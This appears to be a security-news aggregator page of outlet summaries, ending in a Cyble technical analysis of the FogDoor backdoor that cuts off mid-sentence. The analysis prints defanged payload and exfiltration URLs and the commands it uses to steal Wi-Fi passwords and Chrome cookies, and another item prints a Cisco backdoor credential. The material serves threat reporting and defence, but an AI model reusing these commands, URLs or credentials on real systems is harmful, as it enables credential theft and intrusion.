Security News

A set of five critical security shortcomings have been disclosed in the Ingress NGINX Controller for Kubernetes that could result in unauthenticated remote code execution, putting over 6,500 clusters at immediate risk by exposing the component to the public internet. The vulnerabilities (CVE-2025-24513, CVE-2025-24514, CVE-2025-1097, CVE-2025-1098, and CVE-2025-1974 ), assigned a CVSS score of

by The Hacker News

Microsoft on Monday announced a new feature called inline data protection for its enterprise-focused Edge for Business web browser. The native data security control is designed to prevent employees from sharing sensitive company-related data into consumer generative artificial intelligence (GenAI) apps like OpenAI ChatGPT, Google Gemini, and DeepSeek. The list will be expanded over time to

by The Hacker News

Oracle is caught up in a cybersecurity mess right now, with claims about a massive data breach affecting…

by Hackread

The Trump administration’s national security leaders accidentally included the editor-in-chief of the Atlantic, Jeffrey Goldberg, in a chat on Signal discussing confidential plans to attack Yemen’s Houthis. “I could not believe that the national-security leadership of the United States would communicate on Signal about imminent war plans,” Goldberg wrote of the March 15 messages, which […]

by TechCrunch

The hackers compromised home routers made by Zyxel to gain entry into a “major” telecommunications company''s environment.

by The Record

DNA-testing company 23andMe has filed for bankruptcy, which means the future of the company’s vast trove of customer data is unknown. Here’s what that means for your genetic data.

by WIRED Security News

E-ZPass phishing texts have hit many thousands of people over the last few months - even non-drivers. Here''s what to do if you receive one.

by ZDNET Security

China-linked APT Weaver Ant infiltrated the network of a telecommunications services provider for over four years.  The China-linked threat actor Weaver Ant infiltrated the network of a telecom provider in Asia for over four years. During a forensic investigation, Sygnia researchers observed multiple alerts that revealed a re-enabled threat actor account by a service account […]

by Security Affairs

When you think of malware, your mind probably jumps to malicious downloads or email attachments. But it turns…

by Hackread

The group, called FishMonger or Aquatic Panda, is working under contract for the Chinese government to steal data from governmental organizations, Catholic charities, NGOs, think tanks, and more.

by Dark Reading

Cyble threat intelligence researchers have uncovered a GitHub repository masquerading as a hiring coding challenge that tricks developers into downloading a backdoor to steal sensitive data. The campaign uses a number of unusual techniques, such as using a social media profile for command and control (C&C) activities instead of C&C servers. There is evidence that the campaign may be expanding beyond a fake hiring challenge for developers, as Cyble Research and Intelligence Labs (CRIL) researchers also found invoice-themed lures. Fake Hiring Challenge Targets Polish Developers The Cyble researchers said in a blog post that the campaign appears to target Polish-speaking developers, and the malware uses geofencing to restrict execution. The researchers speculated that the campaign is delivered via job platforms like LinkedIn or regional developer forums. The fake recruitment test, named “FizzBuzz,“ is used to trick victims into downloading an ISO file containing a JavaScript exercise and a malicious LNK shortcut. When executed, the LNK file (“README.lnk”) runs a PowerShell script that installs a stealthy backdoor dubbed “FogDoor” by the researchers. “This backdoor is designed for persistence, data theft, and remote command execution while avoiding detection,” Cyble wrote. Instead of using C&C servers, FogDoor communicates with a social media platform via a Dead Drop Resolver (DDR) technique, retrieving attack commands from a social media profile, the researchers said. The malware uses geofencing to restrict execution to Polish victims. Once active, “it systematically steals browser cookies, Wi-Fi credentials, and system data, staging them for exfiltration before deleting traces,” Cyble said. The malware uses remote debugging to steal Chrome cookies and can operate in background mode, while Firefox credentials are taken from profile directories. PowerShell Script Establishes Persistence The PowerShell script also opens a “README.txt” file “to mislead users into believing they are interacting with a harmless file,” Cyble said. That document contains instructions for a code bug fix task, “making it appear harmless while ensuring the PowerShell script executes only once on the victim’s machine to carry out malicious activities.” The PowerShell script also downloads an executable file and saves it as “SkyWatchWeather.exe” in the “C:\Users\Public\Downloads” folder and creates a scheduled task named “Weather Widget,” which executes the downloaded file using mshta.exe and VBScript and is set to run every two minutes indefinitely. SkyWatchWeather.exe acts as a backdoor by using a social media platform (bark.lgbt) and a temporary webhook service (webhookbin.net) as its C&C infrastructure. After verifying location, the malware attempts to establish a connection with “bark.lgbt/api” to await further commands, which are embedded within the profile information of a social media platform. That setup also makes detection and takedown efforts more challenging, Cyble said. Stopping Hiring Scams and Cyberattacks The researchers had a number of recommendations for protecting against FizzBuzz, FogDoor and similar attacks, such as: Cross-checking job offers and coding challenges from unverified sources Refraining from downloading and running files from unknown repositories, particularly ISO images and script files Restricting the execution of PowerShell, JavaScript and other scripting languages unless explicitly required, and using application whitelisting Monitoring outbound connections to uncommon domains or file-sharing services Protecting browser-stored credentials with multi-factor authentication (MFA) and password managers. The full Cyble blog contains deeper analysis of the campaign and includes Yara and Sigma detection rules, indicators of compromise (IoCs) and MITRE ATT&CK techniques.

by The Cyber Express

On March 21st, 2025, Vercel disclosed a critical vulnerability affecting Next.js middleware [1]. CVE-2025-29927 is an authorization bypass vulnerability that impacts the framework''s middleware system, which is often used by developers to enforce authentication, authorization, path rewriting, server-side redirects, and security-related headers like Content Security Policy (CSP). Given the popularity of Next.js, with millions of downloads weekly, the vulnerability may have a severe impact on services that use vulnerable versions of Next.js.

by Picus Security

Designed for Microsoft''s Security Copilot tool, the AI-powered agents will automate basic tasks, freeing IT and security staff to tackle more complex issues.

by ZDNET Security

The FBI''s Denver field office says the tools will convert documents while also dropping malware and scraping users'' systems for sensitive data.

by Dark Reading

A ransomware-as-a-service (RaaS) operation called VanHelsing has already claimed three victims since it launched on March 7, 2025. ""The RaaS model allows a wide range of participants, from experienced hackers to newcomers, to get involved with a $5,000 deposit. Affiliates keep 80% of the ransom payments, while the core operators earn 20%,"" Check Point said in a report published over the weekend

by The Hacker News

Thai law enforcement on Saturday reportedly confiscated 38 Starlink satellite internet transmitters allegedly intended to be used in scam compounds in Myanmar.

by The Record

Get details on this recent vulnerability, how to respond, and how Legit can help. 

by Legit Security

With the genetic testing site filing for bankruptcy protection, you''ll definitely want to delete your account and have any stored samples destroyed.

by ZDNET Security

Exposing MFA’s weaknesses in an era of advanced threats.

by SC Media

More than 40% of all Internet-facing container orchestration clusters are at risk.

by Dark Reading

We recently conducted research in Denmark and Sweden to understand security culture in local organizations better.

by KnowBe4

Phishing-as-a-service (PhaaS) platforms drove a surge in phishing attacks in the first two months of 2025, according to researchers at Barracuda.

by KnowBe4

Tornado Cash was used to launder billions in stolen crypto, according to the Treasury.

by TechCrunch

The government of Union County in central Pennsylvania said a recent ransomware attack exposed information related to law enforcement and other government business.

by The Record

The persistent threat actor was caught using sophisticated Web shell techniques against an unnamed telecommunications company in Asia.

by Dark Reading

Crossing into the United States has become increasingly dangerous for digital privacy. Here are a few steps you can take to minimize the risk of Customs and Border Protection accessing your data.

by WIRED Security News

Cloudflare''s AI Labyrinth has a message for bots: Get lost. Here''s how to toggle on the tool.

by ZDNET Security

LayerX Labs reports a sophisticated macOS phishing campaign, evading security measures. Learn how attackers adapt and steal credentials from Mac users.

by Hackread

Tokyo Electron U.S. Holdings, Inc., the American arm of Japanese semiconductor equipment giant Tokyo Electron Limited (TEL), has disclosed a cyber incident involving unauthorized access to internal systems and the exfiltration of employee business email credentials. While the scope of the breach appears limited, the incident underscores persistent risks even among top-tier global tech firms. … The post Semiconductors Giant Tokyo Electron U.S. Suffers Data Breach appeared first on CyberInsider.

by Cyber Insider

Elastic has discovered AbyssWorker, a fileless malware designed to mine cryptocurrency in cloud-based and containerized Linux environments. It leverages shell scripts, LOLBins, and compromised tokens to install itself without leaving traces on disk. Its infrastructure bears similarities to known Chinese cybercriminal groups. Expert Analysis:AbyssWorker is not just a “basic” cryptojacker: it targets modern, poorly protected […] The post AbyssWorker: stealth cryptojacking targeting cloud and containers appeared first on ZENDATA Cybersecurity.

by Zendata

Cary, NC, 24th March 2025, CyberNewsWire

by Hackread

The ad hoc addition to the otherwise tightly controlled White House information environment could create blind spots and security exposures while setting potentially dangerous precedent.

by WIRED Security News

Law enforcement agencies in seven African countries arrested over 300 suspected cybercriminals involved in mobile banking, investment and messaging app scams, according to a statement on Monday by Interpol.

by The Record

A quiet tweak in a popular open-source tool opened the door to a supply chain breach—what started as a targeted attack quickly spiraled, exposing secrets across countless projects. That wasn’t the only stealth move. A new all-in-one malware is silently stealing passwords, crypto, and control—while hiding in plain sight. And over 300 Android apps joined the chaos, running ad fraud at scale behind

by The Hacker News

by SC Media

In this episode, Isabelle Meyer, Co-CEO of ZENDATA Cybersecurity, reflects on her career path, from her early days as Head of Litigation in London to becoming a Managing Partner in Geneva and co-founding ZENDATA. With extensive experience in cybersecurity and international business development, she shares her perspective on the evolving challenges in digital security. One […] The post Podcast: Isabelle Meyer, Cybersecurity, AI, and the Future of Digital Protection appeared first on ZENDATA Cybersecurity.

by Zendata

Russia and China spend billions of dollars on state media, propaganda, and disinformation, while the Trump administration has slashed funding for US agencies.

by Dark Reading

Cybersecurity researchers have uncovered two malicious extensions in the Visual Studio Code (VSCode) Marketplace that are designed to deploy ransomware that''s under development to its users. The extensions, named ""ahban.shiba"" and ""ahban.cychelloworld,"" have since been taken down by the marketplace maintainers. Both the extensions, per ReversingLabs, incorporate code that''s designed to invoke a

by The Hacker News

Google has admitted a technical issue caused timeline data to vanish. But you might be able to get yours back. Here''s how.

by ZDNET Security

If given the choice, most users are likely to favor a seamless experience over complex security measures, as they don’t prioritize strong password security. However, balancing security and usability doesn’t have to be a zero-sum game. By implementing the right best practices and tools, you can strike a balance between robust password security and a frictionless user experience (UX). This article

by The Hacker News

​California-based genetic testing provider 23andMe has filed for Chapter 11 bankruptcy and plans to sell its assets following years of financial struggles. [...]

by BleepingComputer

The company''s Chapter 11 announcement is alarming regulators and privacy advocates who are warning customers to delete the genetic information retained by 23andMe.

by The Record

Explore industry moves and significant changes in the industry for the week of March 24, 2025. Stay updated with the latest industry trends and shifts.

by SecurityWeek

The effects of the backlog is already being felt in vulnerability management circles where NVD data promises an enriched source of truth. The post NIST Still Struggling to Clear Vulnerability Submissions Backlog in NVD appeared first on SecurityWeek.

by SecurityWeek

How aware are you that your personal information could be bought and sold without your consent—and that there are companies whose entire business model revolves around this? So, these companies, called data brokers, collect everything they can about you – where you shop, what you search online, even stuff from public records – and then sell it to other companies, mostly for ads. The real problem lies in the lack of transparency since most people … More → The post Protecting your personal information from data brokers appeared first on Help Net Security.

by Help Net Security

A step-by-step guide for open source maintainers on how to handle vulnerability reports confidently from the start. The post A maintainer’s guide to vulnerability disclosure: GitHub tools to make it simple appeared first on The GitHub Blog.

by The GitHub Blog

Oracle has denied that Cloud systems have been breached after a hacker claimed to have stolen millions of records. The post Oracle Denies Cloud Breach After Hacker Offers to Sell Data  appeared first on SecurityWeek.

by SecurityWeek

A new multi-platform ransomware-as-a-service (RaaS) operation named VanHelsing has emerged, targeting Windows, Linux, BSD, ARM, and ESXi systems. [...]

by BleepingComputer

FCC chair warns these companies may still be operating in the US because they don''t believe that being added to its "Covered List" poses any serious risk.

by Dark Reading

Ukrzaliznytsia, Ukraine’s state-owned railway operator, has been hit by a cyberattack that disrupted online ticket sales.

by TechCrunch

In this video, Michael Allen discusses how to test Adversary-in-the-Middle attacks without using hacking tools. He delves into the intricacies of credential harvesting, the evolution of multi-factor authentication (MFA), and how attackers adapt their strategies to bypass security measures. The post How to Test Adversary-in-the-Middle Without Hacking Tools appeared first on Black Hills Information Security.

by Black Hills Information Security

A Russian exploit acquisition firm is offering up to $4 million for a full-chain exploit targeting messaging service Telegram. The post Russian Firm Offers $4 Million for Telegram Exploits appeared first on SecurityWeek.

by SecurityWeek

Medusa ransomware uses a malicious Windows driver ABYSSWORKER to disable security tools, making detection and mitigation more difficult. Elastic Security Labs tracked a financially driven MEDUSA ransomware campaign using a HEARTCRYPT-packed loader and a revoked certificate-signed driver, ABYSSWORKER, to disable EDR tools. The attackers used a 64-bit Windows PE driver named smuol.sys, disguised as a […]

by Security Affairs

In 2024, Darktrace identified a cluster of intrusions involving the state-linked malware, ShadowPad. This blog will detail ShadowPad and the associated activities detected by Darktrace.

by Darktrace

A critical security flaw has been disclosed in the Next.js React framework that could be potentially exploited to bypass authorization checks under certain conditions. The vulnerability, tracked as CVE-2025-29927, carries a CVSS score of 9.1 out of 10.0. ""Next.js uses an internal header x-middleware-subrequest to prevent recursive requests from triggering infinite loops,"" Next.js said in an

by The Hacker News

At SUSECon ''25, SUSE unveiled a rebranded portfolio emphasizing Linux support, cloud-native workloads, edge computing, and AI.

by ITPro Today

Ukrzaliznytsia, Ukraine''s national railway operator, has been hit by a massive cyberattack that disrupted online services for buying tickets both through mobile apps and the website. [...]

by BleepingComputer

Disclaimer: This document is for educational purposes only. Exploiting systems without authorization is illegal and punishable by law.Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Free Article LinkContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Driver with expired certificate evades EDR controls and deploys Medusa ransomware.

by SC Media

Many Internet service providers (ISPs) worldwide are alerting customers of an outage that started Saturday night and triggered DrayTek router connectivity problems. [...]

by BleepingComputer

Online Fact-Checking Industry, Programming, AI, ADHD, Productivity, Addiction, and God.

by Hive Five

A backbone of our economy, Fortune 500 companies employ more than 31 million people worldwide. According to data analyzed by the Enzoic research team, over the past three years of 2022, 2023, and 2024, more than three million employee-linked accounts became newly compromised by cybercriminals. 1 in 10 Fortune 500 employees had their credentials exposed in recent years 5.7 exposure average per compromised account These leaked credentials pose significant risks, enabling account takeover (ATO), spear … More → The post Report: Fortune 500 employee-linked account exposure appeared first on Help Net Security.

by Help Net Security

The rise of AI-generated deepfakes has placed the financial services industry and its customers at the epicenter of this growing cyber threat.  Whether deepfake fraud is hitting consumers, commercial accounts, or financial institutions themselves, organizations in the banking and financial services sector will need new processes and cybersecurity controls to address this new generation of financial fraud and scams.  A new Cyble report – Addressing Deepfake Risks in BFSI – looks at a wide range of financial deepfake threats and offers a comprehensive vision for structuring financial services cyber defenses against these new threats.  Here are some of the report''s findings. It is available as a free download along with other Cyble research reports.  Even Financial Employees Get Fooled by Deepfakes  These new deepfake threats are becoming so realistic that they’re fooling even financial professionals in some cases.  In one alarming incident, a financial employee at a renowned design and engineering firm was duped into attending a video call with people he believed were the company’s chief financial officer (CFO) and other coworkers, yet all of them turned out to be deepfake impersonations.  While the worker initially suspected phishing, the video call was so convincing that he wound up sending more than $25 million over 15 transactions.  That type of scam has now become part of the standard playbook for cybercriminals, and video and voice fakes will only become more convincing as GenAI tools continue to evolve.  Defending Against Financial Services Deepfakes  Cyble offered strategies for defending against deepfake scams, including ways to detect fraudulent account applications and activity.  Financial services firms have long been a prime target for cyberattacks and fraud compared to other sectors, which has resulted in some of the most substantial cybersecurity controls of any sector, public or private. That gives Banking, Financial Services, and Insurance (BFSI) organizations a good start on the controls needed for the new era of AI and deepfake threats.  To protect against such threats, Cyble recommends a range of controls for both processes and cybersecurity, some of which include:  There could be multiple levels of approval for transactions above a certain amount, which could vary based on the size of the customer involved. Codewords may need to become a new requirement for sensitive financial communications.  Device and account controls for financial transactions and privileged accounts should be as stringent as possible and go well beyond one-time passwords (OTP) to include additional factors such as biometrics, device security posture, and the use of additional accounts and devices for verification.  Email filtering for spam and phishing attacks is another essential practice, as large language models (LLMs) have made phishing attacks significantly more effective.  Monitoring customer accounts for potentially fraudulent activity and anomalous transactions has become more critical than ever.  Because most credential theft occurs via infostealer malware, stolen credentials may appear on the dark web before attempts to hack an account occur, making leaked credentials an important early warning sign. Therefore, dark web monitoring for both company and customer credential theft could increasingly become a core practice by financial services companies – and make cybersecurity in general a competitive differentiator for BFSI organizations.  Deepfake detection and takedown services have also become a critical cyber defense. Cyble notes that “Ideally, it will become ubiquitous even in consumer devices in the years ahead, as present spam controls are inadequate protection for this new era of threats.”  Employee and customer education and training are also critically important defenses, and deepfake audio and video attack simulations must become part of security awareness and training programs.  Conclusion  Today’s cybercriminals are working with AI-powered tools that were inconceivable just a few short years ago. Those tools are creating deepfakes and AI-generated threats that have already met with considerable success.  Financial organizations must respond with urgency to stay on top of these growing threats. New financial processes and cybersecurity controls are just some of the measures that will be required to shore up defenses against deepfake threats.  Cyble offers a Deepfake Detection Tool integrated within its Executive Monitoring Module. The tool utilizes advanced AI algorithms to detect and analyze manipulated media, such as videos and audio files, in real-time, safeguarding executives and organizations from deepfake threats. In addition to deepfake detection, Cyble’s Executive Monitoring module offers comprehensive protection for high-profile executives by detecting and alerting on digital threats such as identity theft, public mentions, data breaches, and compromised credentials.  Cyble’s Dark Web Monitoring solution is another way for financial organizations to stay on top of threats, including leaked internal and customer account credentials. Cyble also offers a comprehensive suite of threat intelligence, cloud security, and attack surface management platforms.  The post Stopping Deepfakes in Financial Services Will Require New Processes: Cyble appeared first on Cyble.

by CYBLE

A China-linked advanced threat group named Weaver Ant spent more than four years in the network of a telecommunications services provider, hiding traffic and infrastructure with the help of compromised Zyxel CPE routers.  [...]

by BleepingComputer

A new ransomware-as-a-service (RaaS) offering dubbed VanHelsingRaaS has surfaced, rapidly gaining traction within cybercriminal circles since its launch earlier this month. Within just two weeks, it has already claimed at least three victims, demanding up to $500,000 in Bitcoin and showcasing cross-platform capabilities that mark a significant evolution in the RaaS threat landscape. Check Point … The post New VanHelsing ransomware demands $500,000 ransom payments appeared first on CyberInsider.

by Cyber Insider

Understand whether BAS, Automated Penetration Testing, or the combined approach of Adversarial Exposure Validation (AEV) aligns best with your organization’s unique security needs. The post Webinar Tomorrow: Which Security Testing Approach is Right for You? appeared first on SecurityWeek.

by SecurityWeek

DOGE is making wild moves at CISA, including bringing back fired probationary employees only to put them on paid leave, and reportedly gutting the agency''s red teams.

by ITPro Today

A hacker hijacked New York University’s (NYU) website on Saturday morning, leaking highly sensitive admissions data for more than 3 million applicants spanning over three decades. The breach, which lasted approximately two hours, also included accusations that NYU has continued to factor race into its admissions decisions despite the U.S. Supreme Court’s 2023 ban on … The post NYU Website Hack Leads to the Exposure of 3 Million Applicants’ Data appeared first on CyberInsider.

by Cyber Insider

A critical vulnerability (CVE-2025-29927) in the open source Next.js framework can be exploited by attackers to bypass authorization checks and gain unauthorized access to web pages they should no have access to (e.g., the web app’s admin panel). Vercel – the Cloud platform-as-a-Service company that develops the popular framework – has released security updates fixing it, and has advised users to upgrade as soon as possible. What is Next.js and how does CVE-2025-29927 manifest? Next.js … More → The post Critical Next.js auth bypass vulnerability opens web apps to compromise (CVE-2025-29927) appeared first on Help Net Security.

by Help Net Security

Security Week 2025 has officially come to a close. Our updates for the week included a deep dive on our AI offering, a unified navigation experience, and an introduction to our AI Agent Cloudy.

by Cloudflare

Today we''re announcing our latest contribution to Node.js, now available in v23.8.0: URLPattern.

by Cloudflare

The concept of “principle of least privilege” has been around for a long time. In fact, it is older than me; there are papers from the 70s that discuss it:

by SpiderLabs Blog

The US Department of the Treasury has removed sanctions against the fully decentralized cryptocurrency mixer service Tornado Cash. The post US Lifts Sanctions Against Crypto Mixer Tornado Cash appeared first on SecurityWeek.

by SecurityWeek

The FCC is investigating whether Chinese firms such as Huawei, ZTE and China Telecom are still operating in the US. The post Despite Rip-and-Replace Efforts, FCC Suspects Banned Chinese Telecom Providers Still Active in US appeared first on SecurityWeek.

by SecurityWeek

African law enforcement authorities have arrested 306 suspects as part of ''Operation Red Card,'' an INTERPOL-led international crackdown targeting cross-border cybercriminal networks. [...]

by BleepingComputer

A critical severity vulnerability has been discovered in the Next.js open-source web development framework, potentially allowing attackers to bypass authorization checks. [...]

by BleepingComputer

As 23andMe''s bankruptcy looms, privacy experts warn customers to delete their DNA data.

by TechCrunch

For the latest discoveries in cyber research for the week of 24th March, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Municipalities in four US states experienced cyberattacks that disrupted services for county offices, courts, and schools. Cleveland Municipal Court was hit by Qilin ransomware attack, forcing employees offline and delaying trials, while […] The post 24th March – Threat Intelligence Report appeared first on Check Point Research.

by Check Point Research

As the energy sector faces rising AI adoption, cyber threats, and unpredictable disruptions, real-time data access is more critical than ever: Edge computing is emerging as a key solution.

by ITPro Today

In this blog, Bishop Fox's Nick Cerne, will compare developing malware in Rust compared to its C counterparts and develop a simple malware dropper for demonstration.

by Bishop Fox

The agency is cracking down on the use of prohibited technologies following a series of hacks into U.S. telecommunications firms.

by Cybersecurity Dive

The Medusa ransomware relies on a malicious Windows driver to disable the security tools running on the infected systems. The post Medusa Ransomware Uses Malicious Driver to Disable Security Tools appeared first on SecurityWeek.

by SecurityWeek

The SANS Technology Institute has issued a critical warning for organizations using Cisco''s Smart Licensing Utility (CSLU), urging them to update their systems immediately to address two serious vulnerabilities. These flaws, which were first disclosed by Cisco in September 2024, pose cybersecurity risks. The vulnerabilities could allow attackers to gain unauthorized access to sensitive information or even take control of affected systems.  The Cisco Smart Licensing Utility (CSLU) is primarily used in smaller, on-premises, and air-gapped networks to manage licenses for Cisco products. Unlike the more complex cloud-based Cisco Smart Licensing system, CSLU offers a simpler way to handle licensing in isolated environments. However, these new vulnerabilities—CVE-2024-20439 and CVE-2024-20440—have raised questions due to their potential to expose critical systems to cyberattacks.  CVE-2024-20439 and CVE-2024-20440  [caption id=""attachment_101557"" align=""alignnone"" width=""713""] Details of the vulnerabilities (Source: Cisco)[/caption] The vulnerabilities discovered within CSLU are notably concerning for their simplicity and severity. CVE-2024-20439, also known as the Static Credential Vulnerability, allows attackers to exploit an undocumented static user credential, granting them administrative access to systems running the affected versions of Cisco Smart Licensing Utility. This flaw is particularly dangerous because it can be exploited remotely, even by unauthenticated users, providing attackers with full administrative privileges via the application’s API.  The second vulnerability, CVE-2024-20440, is an Information Disclosure Vulnerability. This flaw arises from excessive verbosity in a debug log file, which can expose sensitive information, including credentials that attackers could use to access the CSLU API. Both vulnerabilities are critical, with Cisco assigning a CVSS base score of 9.8, indicating their high severity.  Exploitation and Early Indicators  In a March 19 report, Johannes Ullrich, Dean of Research at SANS Technology Institute, warned that exploit attempts for these vulnerabilities have already been detected. The exploits target the backdoor credentials that were originally revealed shortly after Cisco’s public advisory in September. The SANS team identified that these credentials were being used in recent API calls. This is not surprising, as security researcher Nicholas Starke had previously reverse-engineered the flaws and shared the backdoor credentials on his blog.  Ullrich emphasized that the vulnerability was exacerbated by Cisco’s public advisory, which inadvertently shared details of the backdoor credentials, making it easier for attackers to exploit the issue. The backdoor credentials, identified as cslu-windows-client:Library4C$LU, have been seen in exploit attempts targeting the CSLU API.  Conclusion   Cisco has confirmed that no workarounds are available for the critical vulnerabilities in the Cisco Smart Licensing Utility (CSLU), and the only solution is to apply the patches released by Cisco. Affected organizations should update to versions 2.0.0, 2.1.0, or 2.2.0, or upgrade to version 2.3.0 or later, which is not vulnerable.   This situation highlights the importance of timely software updates to prevent exploitation. With active attacks already detected, organizations are urged to act immediately to secure their systems. For more information, users should visit Cisco’s advisory page or contact Cisco support.

by The Cyber Express

Once security teams recognize that Macs are vulnerable, they can take the needed steps to keep their macOS users safe.

by SC Media

A critical flaw in the Next.js React framework could be exploited to bypass authorization checks under certain conditions. Maintainers of Next.js React framework addressed a critical vulnerability tracked as CVE-2025-29927 (CVSS score of 9.1) with the release of versions versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3. “Next.js version 15.2.3 has been released to address a security vulnerability […]

by Security Affairs

Cloak ransomware group claims attack on Virginia attorney general''s office, demands ransom for stolen data. Investigation underway. Find out the impact and what''s being done.

by Hackread

Key Takeaways A GitHub repository masqueraded as a coding challenge to deceive developers, particularly targeting Polish-speaking job seekers Opening the provided ISO file triggers a PowerShell script that installs a backdoor named “FogDoor” and steals sensitive data. The backdoor retrieves commands from a social media profile and exfiltrates stolen data using temporary webhook services, making detection more difficult. The malware extracts browser cookies, saved credentials, installed applications, and file details for exfiltration. The malware achieves persistence through scheduled tasks and deletes traces after data exfiltration to avoid detection. The campaign is evolving, now using invoice-themed lures alongside recruitment scams to broaden its target scope. Overview Threat Actor (TA) is deploying a targeted social engineering campaign against Polish-speaking developers by disguising malware as a technical coding challenge on GitHub. Using a fake recruitment test named ""FizzBuzz"", the TA tricks victims into downloading an ISO file containing a seemingly harmless JavaScript exercise and a malicious LNK shortcut. Upon execution, the LNK file runs a PowerShell script, which installs a stealthy backdoor named “FogDoor.” This backdoor is designed for persistence, data theft, and remote command execution while avoiding detection. Instead of using traditional C&C servers, FogDoor communicates with a social media platform via a Dead Drop Resolver (DDR) technique, retrieving attack commands from a social media profile. The malware employs geofencing to restrict execution to Polish victims, ensuring targeted impact. Once active, it systematically steals browser cookies, Wi-Fi credentials, and system data, staging them for exfiltration before deleting traces. Persistence is maintained via a scheduled task, which reactivates the malware every two minutes. The malware also uses remote debugging to extract Chrome cookies, while Firefox credentials are harvested from profile directories. It then compresses stolen data, uploads it to a file-sharing service, and notifies the TA via a temporary webhook service for retrieval. Further investigation revealed an expansion of the campaign beyond recruitment-based attacks. A newly discovered GitHub repository now distributes malicious invoice-themed LNK shortcuts (e.g., “faktura_2025.pdf.lnk”) using the same FogDoor backdoor and attack infrastructure. Figure 1 - Infection Chain Technical Analysis On March 10, 2025, Cyble Research and Intelligence Labs (CRIL) identified a GitHub repository delivering an information stealer under the guise of a recruitment challenge. The repository, named ""FizzBuzz,"" was created under the username ""Rekrutacja-JS"" and hosted an ISO file titled ""Zadanie rekrutacyjne.iso."" The repository name references a well-known coding challenge commonly used in technical interviews, making it appear as a legitimate hiring assessment for developers. The username, written in Polish, translates to ""Recruitment-JS,"" indicating a focus on developers. Meanwhile, the ISO file name, ""Zadanie rekrutacyjne,"" translates to ""recruitment task"" or ""hiring task,"" reinforcing the illusion that it contains a genuine coding test. This repository is part of a targeted campaign against Polish-speaking developers in Poland and the Polish diaspora in nearby nations. The use of Polish-language elements suggests the attack is tailored for job seekers in this geographic area. Although the exact distribution method remains unclear, the TA is likely using job platforms like LinkedIn or regional developer forums to lure victims into downloading and executing the malicious ISO file. Figure 2 - GitHub repo When the user opens the ISO file, two files are displayed: ""FizzBuzz.js"" and ""README.lnk."" The ""FizzBuzz.js"" file contains a JavaScript script that mimics a typical FizzBuzz coding challenge commonly used in programming interviews. However, the script is intentionally flawed, likely to make it appear as a legitimate but buggy test. This could lead the target—typically a developer—to focus on debugging the JavaScript file, reinforcing the illusion of an authentic recruitment task. The figure below shows the contents of the JavaScript file. Figure 3 - FizzBuzz.js Upon execution, the shortcut file “README.lnk"" runs a PowerShell script hosted on catbox.moe, a free file hosting platform, using mstha.exe. The figure below shows the contents of the LNK file. Figure 4 - Shortcut file PowerShell Script The PowerShell script (SHA-256: 33bc5fa9798219ba6d4e31f91ec23982596c409e0fd73e2c0c33c70538b7ec83) is designed to install a backdoor, extract Chrome cookies, steal Firefox browser data, retrieve Wi-Fi passwords, and collect a list of installed applications on the victim’s machine. Additionally, it opens a “README.txt” file as a decoy to mislead users into believing they are interacting with a harmless file. Lure file The PowerShell script first checks if ""README.txt"" exists in the user''s profile directory. If the file is present, it opens it using notepad.exe and exits without executing any malicious actions. However, if the file is missing, the script downloads it from ""hxxps://files.catbox.moe/umh6no[.]txt"", saves it as “README.txt”, and opens it. This decoy document contains instructions for a code bug fix task, making it appear harmless while ensuring the PowerShell script executes only once on the victim’s machine to carry out malicious activities. Figure 5 - Lure file Persistence Next, the PowerShell script downloads an executable file from “hxxps://raw.githubusercontent.com/coder9540/weather_widget/refs/heads/main/SkyWatchWeather[.]exe” and saves it as “SkyWatchWeather.exe” in the “C:\Users\Public\Downloads” folder. It then creates a scheduled task named “Weather Widget”, which executes the downloaded file using mshta.exe and VBScript. The task is set to run indefinitely every two minutes. Figure 6 - Scheduled Task FogDoor “SkyWatchWeather.exe” acts as a backdoor that does not rely on a traditional C&C server with a fixed IP or domain. Instead, it uses a social media platform (bark.lgbt) and a temporary webhook service (webhookbin.net) as its C&C infrastructure.  The executable first identifies the victim''s location using the “wttr.in” service, which retrieves weather data along with country information. It then extracts the country name and compares it to the hardcoded value ""Poland."" If the detected country is ""Poland,"" the malware proceeds to execute its malicious activities. We have named this backdoor “FogDoor” for tracking purposes. Figure 7 - Country check Following this verification, the malware attempts to establish a connection with “bark.lgbt/api” to retrieve further commands for execution. These commands are embedded within the profile information of a social media platform and are accessed via the URL: “hxxps://bark.lgbt/api/v1/accounts/lookup?acct=PawsitiveVibes” as shown below. Figure 8 – Social Media profile information retrieved through API Once the JSON response is received, the malware extracts the value of the “note” key from the response data, which is expected to contain commands for execution. The “note” field functions as a Dead Drop Resolver (DDR)—a technique used to discreetly deliver commands to malware without relying on a traditional command-and-control (C&C) server. Instead of establishing direct communication with an attacker-controlled domain, the malware retrieves instructions embedded within a social media profile, making detection and takedown efforts more challenging. The figure below shows the TA''s profile on the social media platform, which is used to store and deliver commands to the malware. Figure 9 - TA’s social media profile   Once the malware retrieves the command, it executes it using functions like “os_exec_Command” and “os_exec___Cmd__Output” The resulting output is then transmitted to the TA via a temporary webhook service at “hxxps://webhookbin.net/v1/bin/5673484c-cc92-4490-ada2-aae774c89bc2” enabling the control of the compromised system. Figure 10 - Sending output data to the TA Stealing WiFi information After creating the scheduled task, the PowerShell script sleeps for six minutes before executing a series of commands. It first runs ""netsh wlan show profiles"" to list all saved Wi-Fi profiles. Then, for each profile, it executes the ""netsh wlan show profile name=""$name"" key=clear"" command to extract the SSID and password. The retrieved data is formatted and directly written to ""wifi.txt"" inside the ""%userprofile%\data"" folder, serving as a staging area before exfiltration. Figure 11 – Wi-Fi password extraction Stealing Chrome browser data: To steal sensitive Chrome data, the PowerShell script first checks if “Chrome.exe” is running. If a process is found, it forcibly terminates it using the command ""Stop-Process -Name chrome -Force"". It then launches Chrome in debugging mode and restores the last session with the following command: C:\Program Files\Google\Chrome\Application\chrome.exe --remote-debugging-port=9222 --restore-last-session --user-data-dir=""C:\Users\<username>\AppData\Local\Google\Chrome\User Data"" If Chrome was not previously running, the script launches “chrome.exe” with the -–headless argument, allowing it to run in the background without a visible interface. Once Chrome is running with remote debugging enabled, the script retrieves the debugging WebSocket URL and passes it to the SendReceiveWebSocketMessage function. Figure 12 – Demonstration of Extracting webSocketDebuggerURL It then issues a request using the ""Network.getAllCookies"" method to extract network cookie data. The retrieved cookies are saved as ""chrome.json"" inside the ""%userprofile%\data"" folder, where they are staged for exfiltration. Figure 13 - Chrome cookie Stealing Firefox browser data: To steal sensitive Firefox browser data, the script 